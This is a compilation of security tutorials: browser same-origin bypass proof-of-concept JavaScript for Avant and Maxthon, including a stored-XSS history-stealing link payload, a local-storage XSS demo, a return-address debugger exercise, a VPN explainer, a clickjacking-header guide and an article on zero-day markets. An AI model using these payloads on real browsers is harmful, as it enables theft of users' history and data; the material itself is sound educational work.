www.wiley.com/go/browserhackershandbook where the original three PoCs have been modified and merged as a single code snippet. Just remember that an additional limitation of this technique is that the resource you want to find, for example http://httpsecure.org/images/arrow.png, might be moved temporarily or permanently b the time you are reading this article. This is already the case for some of the resources used in the original PoC by Zalewski. Reason being both of these techniques rely on specific and short timings when reading from the cache, and they’re both very sensitive to machine performance. The same thing applies to the second technique, where the timing is “hard-coded” to 10 milliseconds. For example, if you’re playing an HD video on Vimeo while your machine is extensively using CPU and IO, the accuracy of the results may decrease. Using Browser APIs Avant is a lesser-known browser that can swap between the Trident, Gecko and WebKit rendering engines. Roberto Suggi Liverani has found an attack for bypassing the same origin policy using specific browser API calls in the Avant browser prior to 2012 (build 28). Let’s consider the following code that shows this issue: var av_if = document.createElement("iframe"); av_if.setAttribute('src', "browser:home"); av_if.setAttribute('name','av_if'); av_if.setAttribute('width','0'); av_if.setAttribute('heigth','0'); av_if.setAttribute('scrolling','no'); document.body.appendChild(av_if); var vstr = {value: ""}; //This works if Firefox is the rendering engine window['av_if'].navigator.AFRunCommand(60003, vstr); alert(vstr.value); The above mentioned code snippet loads the privileged browser:home address into an iframe, and then executes the function AFRunCommand() from its own navigator object. This function is an undocumented and proprietary API that Avant added to the DOM. Liverani tried a brute force on some of the integer values which need to be passed as the first parameter to the function. He found that by passing the value 60003 and a JSON object to the AFRunCommand() function, he was able to retrieve the victim’s full browser history. This is clearly a Same Origin Policy bypassing technique because code running on an origin such as http://httpsecure.org must not be able to read the contents of a higher zone, like browser:home, as per in this code. Executing the previous code snippet would result in a pop- up containing the browser history in it. This issue has been found in Maxthon 3.4.5 (build 2000). Maxthon is another less-known web browser. Roberto Suggi Liverani discovered that the content rendered in the about:history page does not have effective output escaping. This can be exploitable. If an attacker forces a victim to open a malicious link, this injection will persist in the history page until history is cleared: http://example.com/issue/hacked.html#” onload=’prompt(1)'<!— This code will execute each and every time the victim checks the browser history. Also, JavaScript is executing in the privileged zone. The about:history page happens to be mapped to a custom Maxthon resource at mx://res/history/index.htm. Injecting code into this context allows you to steal all the history contents. div: links = document.getElementById('history-list') .getElementsByTagName('a'); result = ""; for(var i=0; i<links.length; i++) { if(links[i].target == "_blank"){ result += links[i].href+"\n"; } } alert(result); This above mentioned payload can be packaged and delivered with the following link: http://example.com/issue/hacked.html#" onload='links=document. getElementById("history-list").getElementsByTagName("a"); result="";for(i=0;i<links.length;i++){if(links[i].target=="_blank") {result+=links[i].href+"\n";}}prompt(result);'<!-- Cross-content scripting vulnerability is stored. So, after loading the malicious content into the history page the first time, the code will execute every time the user revisits their history. In a real case of launching this attack, it would be necessary to replace the prompt() function with one of the hooking techniques. Browser history can be sent to the server. Reference https://browserhacker.com/ Source
-
In a previous article of mine, I discussed Cross Domain Messaging in HTML5. This article walks you through another feature, called local storage, and its security. Local Storage Local storage is one of the new features added in HTML5. It was first introduced in Mozilla 1.5 and eventually embraced by the HTML5 specification. We can use the local storage feature in HTML5 by using the JavaScript objects localStorage and sessionStorage. These objects allow us to store, retrieve and delete data based on name value pairs. The data processed using the localStorage object persists through browser shutdowns, while data created using the sessionStorage object will be cleared after the current browsing session. One important point to note is, this storage is origin-specific. This means that a site from a different origin cannot access the data stored in an application’s local database. Let me make it clear with a simple example. Below is a sample HTML5 application, which is capable of storing data using the local storage feature. We can also retrieve the data stored in the database using the “Show Data” button. Let us first observe the origin of this site. Let us assume that this is “Application A”. http://localhost:8383/ So here are the details: Name: Application A Origin: http://localhost:8383/ Let us click the Show Data button. We are able to access the data stored by this application in the database. That is expected. Now, let us try to access this data stored by application A from a different origin. Let us assume that this is Application B Here are the details: Name: Application B Origin: http://localhost/ Please note that the port number is different from Application A. Let us click the “Show Data” button. When I clicked “Show Data”, there seems to be nothing displayed on the web page. This is because this application is running on a different origin. Just to confirm, let us run a different application named “Application C” from the same origin as “Application A”. Here are the details. Name: Application C Origin: http://localhost:8383/ Let us click “Show Data” and observe the result. Nice! We are able to access the data from this application, since it is from the same origin as Application A. To conclude, I have used the same code in all the above examples but with different origins. We inserted data into the database using Application A. When we tried accessing it from Application B, it failed due to the same origin policy. Let us now see some attacks possible with HTML5 local storage. Storing Sensitive Data Developers may store sensitive information in these databases. It is possible to find API keys or similar sensitive data when working with APIs due to their statelessness. We can exploit them using an XSS vulnerability if there is no physical access to the device. Below is an example of how JavaScript’s localStorage object stores data. We can use the function setItem with some name-value pairs as parameters. localStorage.setItem(“data”, “mydata”); As we can see in the figure below, Chrome stores this data in the following path. We can programmatically read this data using JavaScript as shown below. localStorage.getItem(“data”); We can now go ahead and read this data from the SQLite database as shown below. Script Injection SQLite data, when not properly sanitized, may lead to script injection attacks. Let us see a simple example. Below is the same form we saw in the beginning of the article. Let us store some sample data and retrieve it back as shown below. If this data is not properly sanitized, it will lead to stored XSS Vulnerability as shown below. This time, let us enter the below piece of code into the message box. <img src=’X’ onerror=alert(1);> et us click the “Show Data” button and see the result. As we can see, it has popped up an alertbox due to the JavaScript we injected. Conclusion This article has discussed how the HTML5 local storage feature works and how Same Origin Policy restrictions are applied on the data being stored. Finally, we have had a look at some possible attacks on the HTML5 local storage feature. We will see other HTML5 features and possible attacks in later articles. Source
-
- application
- data
-
(and 3 more)
Tagged with:
-
In the previous article, we learned about the basics of the Stack Based Buffer Overflow, such as analyzing the stack, creating breakpoints and analyzing the function call and registers. With the help of these skills, we will now see how we can manipulate the return addresses dynamically into the program. We will analyze a program in which a function ‘do_not_call’ is defined but has never been called throughout the program. So, our goal is to change the register address in a way so that this function is called and performs the operation which is given in the function. We will perform this task by manipulating the register addresses while the program is running. Let’s take a look at the program. We have already given the source code and the binary file of the program in the end of the article. You can download it here: Download As can be seen in the above screenshot, we have mentioned a number for each function. The description for the same is given below. First of all, we have created a function “do_not_call” which prints the message “Function do_not_call is called” by the printf command. This is another function. The name of this function is ‘function1?, which has the integer return type with one argument. In the next line we have created a local variable. This function prints the message “function1 is called”. This is the main function of the program. The program execution will begin with this function. First, we gave a command to print the message “Main function is called”, and in the next step we initialized the local variable. In the next line, we have called the ‘function1?. You must have noticed that we have not called the “do_not_call” function in our program. Let us verify it by running the program normally. As we can see in the above screenshot, when we run the program normally, it prints two messages, ‘Main Function is called’ and ‘Function1 is called’. Now, we will open the program in Immunity Debugger. After opening the program with Immunity Debugger, we can see four different screens. Each screen is showing a different kind of program data. If we scroll down the first screen we can see all assembly language instructions as well as the strings we have used in the program. You can see the same in the screenshot given below. As can be seen in the above screenshot, the main function starts by pushing the EBP resister into the memory and ends at the RETN instruction. For a better understanding, we have created a table in which we have the starting and ending address of all the functions defined in our program. Function Name Function Starting Address Function Ending Address Main Function 004013C4 00401416 Function 1 004013A4 004013C4 Do_not_call 00401390 004013A3 Now we will make a list of all the function calls taking place in the program. After analyzing the main program, we can see the following function calls: After taking a close look at the above screenshot, we find that there are four function calls in the main program. If we closely look at the functions which are being called, then in the fourth function call, we can see that it is calling to ‘Second.004013A4? in which the last 8 digit address is actually the starting address of ‘function1?. We can verify the same by checking the table we have created above. In simple terms, this statement is calling function1 as we have defined in the program source code. Now, we will create a break point to analyze the Stack, Return Addresses, etc. (We have already mentioned all the basics in the previous article, like what is a breakpoint and how do we create a breakpoint in the debugger, etc., so we are not going to cover this again in this article.) The following steps are mentioned below to further analysis. Create the breakpoint before the 4th function call. We can do this by clicking on the instruction and hitting the F2 key, after that run the program. We can run the program by pressing F9. Now, we can see the following screen in the debugger. As of now, the program execution control has reached that position where we have created the breakpoint. In screen 1, we have created the breakpoint on “00401401” and now the program has paused on this instruction. We can see in screen 2 the EIP register is pointing to the address at which we have created the breakpoint. Now we will execute the instructions step by step for understanding the concept more clearly. Let us execute the next instruction; we can do this by pressing the F7 key, which is Step into. As we can see, execution control is pointing to the next instruction in screen 1 and EIP is also pointing to the instruction address. Now, the execution control would go to address “004013A4? which is the starting address of the function1. We will now execute it and see what changes we come across. Again hit the F7 key to execute the next instruction. We get the following output screen. This step is very critical and important to understand. As can be seen in the above screenshot, the execution pointer has switched from 00401408 (No-1) to 004013A4 (No-2) which is the starting point of ‘function1?. Also, when we take a look at screen 4 we see that the Top of the Stack (No-3) is pointing the address 0040140D (No-4), which is the next instruction from the function call. This address is also called the return address to the main program. It means that after the execution of ‘function1? is complete, then the execution control would switch to this address. If we change this return address, we can actually change the order of execution of the program. So, let us change the return address in the debugger with the address of the ‘do_not_call’ function address which was in the above table. The function “do_not_call” address is: “00401390” To change the address, we will have to right click on the address and click on modify. After that, change the Hexadecimal value and then click on OK. Now, we can see our changes are reflected on screen 4. The top of the stack is pointing to the address of the ‘do_not_call’ function. This will allow us to execute the ‘do_not_call’ function, which was not supposed to be executed in the actual program. Now, we will execute each instruction step by step until we reach the RETN instruction. As we can see, program execution control has reached the RETN instruction. It means the function1 execution has completed and now the execution control will go to the main program (according to our program), but we had changed the return address in the previous step to the function ‘do_not_call’, so the execution control will go to the ‘do_not_call’ function and execute the instruction that it is defined to execute. So, let us execute next instruction step by step and we will see the ‘do_not_call’ function has successfully executed. We can verify the same by checking the output of the program. As can be seen in the above screenshot, by dynamically changing the return address of the program, we are successfully able to execute the function the program was not supposed to execute. So in this article we have learned… Monitoring and Analyzing the Register Value Analyzing Top of Stacks Changing the Return Address References https://www.owasp.org/index.php/Buffer_overflow_attack http://en.wikipedia.org/wiki/C_file_input/output http://www.exploit-db.com/ http://www.pentesteracademy.com/ Source
-
1. Introduction The idea of Virtual Private Network (VPN) is to simulate a private network over a public network. A VPN tunnel can be used to securely connect LANs of the company over an insecure Internet (VPN gateways are responsible for making the connection secure). This article describes how tunneling and cryptography can be used to build VPN tunnels without going into the details of existing VPN protocols. 2. TCP/IP model and encapsulation One needs to understand these topics first before tunneling is discussed. There are four layers in the TCP/IP model: Layer 4: Application layer Layer 3: Transport layer Layer 2: Internet layer Layer 1: Network access layer From the point of view of the sender, the data goes through layers 4 ? 1 (1 ? 4 from the perspective of the receiver). L4PDU (Layer 4 Protocol Data Unit) is sent from the application layer to the transport layer. A TCP header is appended to L4PDU and L3PDU (Layer 3 Protocol Data Unit) is created. L3PDU is called segment. Then L3PDU is sent from the transport layer to the Internet layer. IP header is appended to L3PDU and L2PDU (Layer 2 Protocol Data Unit) is created. L2PDU is called datagram. This simplified description shows that L3PDU (segment) becomes a part of the L2PDU (datagram). In fact, the segment is included in the datagram and this inclusion is called encapsulation. Then the datagram is appended with another header and L1PDU (Layer 1 Protocol Data Unit) is created. L1PDU is called frame. Finally the frame is sent via transmission medium in the form of zeros and ones. From the perspective of the receiver, the exact reverse process occurs (layers 1 ? 4) and is called four step decapsulation. 3. VPN tunnel Normally the data of the application layer is encapsulated into the segment of the transport layer which is further encapsulated into the datagram of the Internet layer. Then the frame of the network access layer encapsulates the datagram and finally the bits are transferred via a physical medium. When VPN tunnel is concerned, one datagram (the internal one) is encapsulated in the another datagram (the external one). This encapsulation is used to carry private addresses through the tunnel. We want to carry private IP addresses through the tunnel, because the goal is to connect local area networks (LANs) at both ends of the tunnel. That’s why the external IP (the one which is not tunneled) is a public address used to connect to the VPN gateway and the internal IP (the one which is tunneled) is a private address. Let’s analyze the real world analogy of tunneling to better understand how it works. The car wants to drive from city C1 to city C2 and these cities are separated by the river. The car is loaded into the ship and transported from C1 to C2. This is exactly how the tunneling works. The internal datagram is tunneled inside another datagram that reaches the VPN gateway. Here the internal datagram is extracted and can be sent to another host. Although the private addresses are not routable in the Internet, they can be traversed using this approach. There is one thing missing. We need to make the tunneling secure, and cryptography is used for this purpose. 4. Using crypto to secure the tunnel The intention of this part of the article is to present briefly how crypto can be applied to make the tunnel secure without going into the cryptographic details. First of all we want the authentication to be achieved. Digital certificates can be used for this purpose. Moreover, the communication should be confidential so that unauthorized users can’t see it. The confidentiality can be achieved by symmetric encryption. Before the symmetric encryption happens, the symmetric key needs to be securely distributed. Asymmetric encryption is used for the purpose of key distribution. Let’s assume that A is communicating with B. The symmetric key is generated by A, encrypted with the public key of B and sent to B. Only B can decrypt it, because B is the only one that has the corresponding private key. In addition to this, we want to be sure that the communication has not been modified. HMAC is used for this purpose (hash of the message sent and the symmetric key). The symmetric key can be regenerated periodically. Then it is called a session key (randomly generated and valid only for one session). If an attacker learns the session key, then he can only decipher the messages sent after the last regeneration of the key and before the next regeneration. This is the way Forward Secrecy is achieved. As far as symmetric encryption is considered, some encryption mode is needed to change the ciphertext in a random way in order not to weaken the encryption key. The solution is a cipher block chaining (CBC) mode of encryption. 5. Summary Remote work via VPN is a standard nowadays. VPN simulates a private network (secure) over the public one (insecure). TCP/IP model and encapsulation were presented first. Then it was described how tunneling works. Finally, we’ve seen how cryptography can be used to make the VPN tunnel secure. Source
-
In this world of the web, we have seen various common attacks like XSS, Clickjacking, Session Hijacking, etc. Various HTTP headers are introduced to defend against these attacks in a simple and easy fashion. In this series of articles, we will see various headers available to protect against common web attacks and we will also see a practical approach of how to implement them in a simple PHP based application. The focus of this series is to give developers a practical touch of how these common attacks can be prevented just by using some HTTP headers. We will setup a vulnerable application to understand these headers in detail. Setting up the lab: You can download the code snippets and database file used in this application here: You can set up this PHP-MYSQL application in XAMPP or WAMP or LAMP or MAMP, depending upon your machine. In my case, I am using a Mac machine and thus using MAMP, and I kept all the files in a folder called “sample” inside my root directory. Application functionality: After setting up the sample application, launch the home page as shown below. http://localhost/sample/index.php As we can see in the above figure, this application has got a very simple login page where the user can enter his credentials. It has got basic server side validations as explained below. The user input fields cannot be empty. This is done using PHP’s empty() function. So, if a user doesn’t enter anything and clicks login, it throws a message as shown below. If the user enters wrong credentials, it throws a message as shown below. This is done after performing a check against user database. If the user enters correct username and password, it goes ahead and shows the home page for the user logged in. This is done using the MySQLi prepared statement as shown below. $stmt = $mysqli->prepare("select * from admin where username=? and password=?"); $stmt->bind_param("ss",$username,$password); $stmt->execute(); username: admin password: 1q2w3e4r5t Note: Please keep in mind that the given password is stored as SHA1 hash in this sample database. This is a common password and this SHA1 hash can be easily be cracked using some online tools. After logging in, a session is created for the user, and there is a simple form which is vulnerable to XSS. Now, let us fire up BurpSuite and just keep a note of the default headers that are set when we login to this application. This looks as shown below. HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 13:59:23 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=17807aed72952730fd48c35ac8e58f9c; path=/ Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 If you clearly observe the above headers, there are no headers added to provide additional security to this application. We can also see the search field after logging in, which is accepting user input and echoing back to the user. Below is the code used to build the page being displayed after login. <?php session_start(); session_regenerate_id(); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Clickjacking prevention using X-Frame-Options header: The first concept that we will discuss is Clickjacking mitigation using X-Frame-Options. How does it work? Usually, an attacker loads a vulnerable page into an iframe to perform clickjacking attacks. In our case, we are going to load the user dashboard page into an iframe as shown below. This page appears after successful login. http://localhost/sample/home.php <!DOCTYPE html> <html> <head> <title>iframe</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> </head> <body> <iframe src="http://localhost/sample/home.php"></iframe> </body> </html> I saved this page as iframe.html on the same server. When we load this in a browser, the above URL will be loaded in an iframe as shown below. Though there are multiple ways to prevent this, we are going to discuss the X-Frame-Options header to keep the content of this article inline with the title. The X-Frame-Options header can be used with the following three values: DENY: Denies any resource from framing the target. SAMEORIGIN: Allows only resources that are part of the Same Origin Policy to frame the protected resource. ALLOW-FROM: Allows a single serialized-origin to frame the protected resource. This works only with Internet Explorer and Firefox. We will discuss each of these options in detail. X-Frame-Options: DENY Let us start with “X-Frame-Options: DENY”. Open up your home.php file and add the following line. header(“X-Frame-Options: DENY”); Now the modified code should look as shown below. <?php session_start(); session_regenerate_id(); header("X-Frame-Options: DENY"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Logout from the application and re-login to observe the HTTP headers now. Below are the HTTP headers from the server after adding X-Frame-options header with the value DENY: HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 14:14:51 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=9190740c224f78bb78998ff40e5247f3; path=/ X-Frame-Options: DENY Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 If you notice, there is an extra header added in the response from the server. If we reload the iframe now, the URL will not be loaded inside the iframe. This looks as shown below. Let us see the reason behind this by navigating to Chrome’s developer tools using the following path. Customize and Control Google Chrome -> More Tools -> Developer Tools\ As we can see in the above figure, this is because of the header we set in the server response. We can check the same in Firefox by using the Web Developer Extension as shown below. If we load the iframe.html page in Firefox, below is the error being displayed in the console. X-Frame-Options: SAMEORIGIN There may be scenarios where framing of this URL is required for this application. In such cases, we can allow framing from the same origin and prevent it from cross origin requests using the value “SAMEORIGIN” with X-Frame-Options header.\ Open up your home.php file and add the following line. header(“X-Frame-Options: sameorigin”);\ Now the modified code should look as shown below. <?php session_start(); session_regenerate_id(); header("X-Frame-Options: sameorigin"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Logout from the application and re-login to observe the HTTP headers now. Below are the HTTP Headers from the server after adding X-Frame-options header with the value sameorigin: HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 14:34:52 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=5f3d66b05f57d67c3c14158621dbba9e; path=/ X-Frame-Options: sameorigin Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Now, let us see how it works with different origins. First let us load the same iframe.html, which is hosted on the same server. As we can see in the figure below, we are able to load the page in the iframe without any problem. Now, I launched Kali Linux using Virtual Box and loaded this URL(http://localhost/sample/home.php)and placed the file on the server, which is a different origin for our current application. Below is the code snippet used on the Kali Linux machine to create iframe.html. When we launch this iframe.html file, it will not load due to the cross origin restriction by the server. We can see that in the error console of iceweasel browser in Kali Linux as shown below. The error clearly shows that the server does not allow cross-origin framing. X-Frame-Options: ALLOW-FROM http://www.site.com X-Frame-Options: ALLOW_FROM option allows a single serialized-origin to frame the target resource. This works only with Internet Explorer and Firefox. Let us see how this works. First, open up your home.php file and add the following line. header(“X-Frame-Options: ALLOW-FROM http://localhost”); Now the modified code should look as shown below. <?php session_start(); session_regenerate_id(); header("X-Frame-Options: ALLOW-FROM http://localhost"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Let us logout from the application and re-login to check if the header is added. HTTP/1.1 200 OK Date: Mon, 13 Apr 2015 02:18:49 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=c8a5b9a76982ae38f0dde3f3bf3480f5; path=/ X-Frame-Options: ALLOW-FROM http://localhost Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 As we can see, the new header is added now. If we now try to load the iframe from the same server, it loads the page without any problem, as shown below. This is because http://localhost is allowed to load this URL. Now, let us try to change the header to something else and try reloading it again. Add the following line in home.php and observe the difference. header(“X-Frame-Options: ALLOW-FROM http://www.androidpentesting.com”); The modified code should look as shown below. <?php session_start(); session_regenerate_id(); header("X-Frame-Options: ALLOW-FROM http://www.androidpentesting.com"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Following are the headers captured from BurpSuite. HTTP/1.1 200 OK Date: Mon, 13 Apr 2015 02:20:26 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=6a8686e1ab466a6c528d8a49a281c74e; path=/ X-Frame-Options: ALLOW-FROM http://www.androidpentesting.com Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 If we now refresh our previous link, it will not load the page in an iframe. If we observe the error console, it shows the following error. It is obvious that framing by http://localhost is not permitted. Conclusion In this article, we have seen the functionality of our vulnerable application and fixed the clickjacking vulnerability using X-Frame-Options header. We have also seen various options available with this header and how they differ from each other. The next article gives coverage of other security headers available. Source
-
- application
- headers
-
(and 3 more)
Tagged with:
-
Introduction Black markets deployed on anonymizing networks such as Tor and I2P offer all kinds of illegal products, including drugs and weapons. They represent a pillar of the criminal ecosystem, as these black markets are the privileged places to acquire illegal goods and services by preserving the anonymity of both sellers and buyers and making it difficult to track payment transactions operated through virtual currencies like Bitcoin. The majority of people ignore that one of the most attractive goods in the underground market are zero-day exploits, malicious codes that could be used by hackers to exploit unknown vulnerabilities in any kind of software. The availability of zero-day exploits is a key element for a successful attack. The majority of state-sponsored attacks that go undetected for years rely on the exploitation of an unknown flaw in popular products on the market and SCADA systems. Zero-day exploits: A precious commodity Security experts have debated on several occasions the importance of the zero-day exploitation to design dangerous software that could target any kind of application. Zero-day exploits are among the most important components of any cyber weapons, and for this reason they are always present in the cyber arsenals of governments. Zero-day exploits could be used by threat actors for sabotage or for cyber espionage purposes, or they could be used to hit a specific category of software (i.e. mobile OSs for surveillance, SCADA application within a critical infrastructure). In some cases, security experts have discovered large scale operations infecting thousands of machines by exploiting zero-day vulnerabilities in common applications (e.g. Java platform, Adobe software). A few days ago, for example, security experts at FireEye detected a new highly targeted attack run by the APT28 hacking crew exploiting two zero-day flaws to compromise an “international government entity.” In this case, the APT28 took advantage of zero-day vulnerabilities in Adobe Flash software (CVE-2015-3043) and a Windows operating system (CVE-2015-1701). Zero-day exploits are commodities in the underground economy. Governments are the primary buyers in the growing zero-day market. Governments aren’t the only buyers however, exploit kits including zero-day are also acquired by non-government actors. In 2013 it was estimated that the market was able to provide 85 exploits per day, a concerning number for the security industry, and the situation today could be worse. It has been estimated that every year, zero-day hunters develop a combined 100 exploits, resulting in 85 privately known exploits, and this estimation does not include the data related to independent groups of hackers, whose activities are little known. Zero-day hunters are independent hackers or security firms that analyze every kind of software searching for a vulnerability. Then this knowledge is offered in black marketplaces to the highest bidder, no matter if it is a private company that will use it against a competitor or a government that wants to use it to target the critical infrastructure of an adversary. A study conducted by the experts at NSS Labs in 2013 titled “The Known Unknowns” reported that every day during a period of observation lasting three years, high-paying buyers had access to at least 60 vulnerabilities targeting common software produced by Adobe, Apple, Microsoft and Oracle. “NSS Labs has analyzed ten years of data from two major vulnerability purchase programs, and the results reveal that on any given day over the past three years, privileged groups have had access to at least 58 vulnerabilities targeting Microsoft, Apple, Oracle, or Adobe. Further, it has been found that these vulnerabilities remain private for an average of 151 days. These numbers are considered a minimum estimate of the ‘known unknowns’, as it is unlikely that cyber criminals, brokers, or government agencies will ever share data about their operations. Specialized companies are offering zero-day vulnerabilities for subscription fees that are well within the budget of. A determined attacker (for example, 25 zero-days per year for USD $2.5 million); this has broken the monopoly that nation states historically have held regarding ownership of the latest cyber weapon technology. Jointly, half a dozen boutique exploit providers have the capacity to offer more than 100 exploits per year.” On the black market, a zero-day exploit for a Windows OS sells for up to $250,000 according to BusinessWeek, a good incentive for hackers to focus their efforts in the discovery of this category of vulnerabilities. The price could increase in a significant way if the bugs affect critical systems and the buyer is a government that intends to use it for Information Warfare. What is very concerning is that in many cases, the professionals who discover a zero-day, in order to maximize gains, offer their knowledge to hostile governments who use it also to persecute dissidents or to attack adversary states. The zero-day market follows its own rules, the commodities are highly perishable, the transactions are instantaneous, and the agreement between buyers and sellers is critical. “According to a recent article in The New York Times, firms such as VUPEN (France), ReVuln (Malta), Netragard, Endgame Systems, and Exodus Intelligence (US) advertise that they sell knowledge of security vulnerabilities for cyber espionage. The average price lies between USD $40,000 and USD $160,000. Although some firms restrict their clientele, either based on country of origin or on decisions to sell to specific governments only, the ability to bypass this restriction through proxies seems entirely possible for determinedcyber criminals. Based on service brochures and public reports, these providers can deliver at least 100 exclusive exploits per year,” states the report. In particular, the US contractor Endgame Systems reportedly offers customers 25 exploits a year for $2.5 million. The uncontrolled and unregulated market of zero-day exploits pose a real threat for any industry. For this reason, security experts and government agencies constantly monitor its evolution. The zero-day market in the Deep Web: “TheRealDeal” marketplace Zero-day exploits have been available in several underground Deep Web marketplaces for a long time, and it is not difficult to find malicious codes and exploit kits in different black markets or hacking forums. Recently a new black market dubbed TheRealDeal has appeared in the Deep Web. The platform was designed to provide both sellers and buyers a privileged environment for the commercialization of precious goods. Figure – TheRealDeal Marketplace TheRealDeal (http://trdealmgn4uvm42g.onion) service appeared last month and it is focused on the commercialization of zero-day exploits. The singular marketplace is hosted on the popular Tor network to protect the anonymity of the actors involved in the sale of the precious commodity. The market offers zero-day exploits related to still unknown flaws and one-day exploits that have been 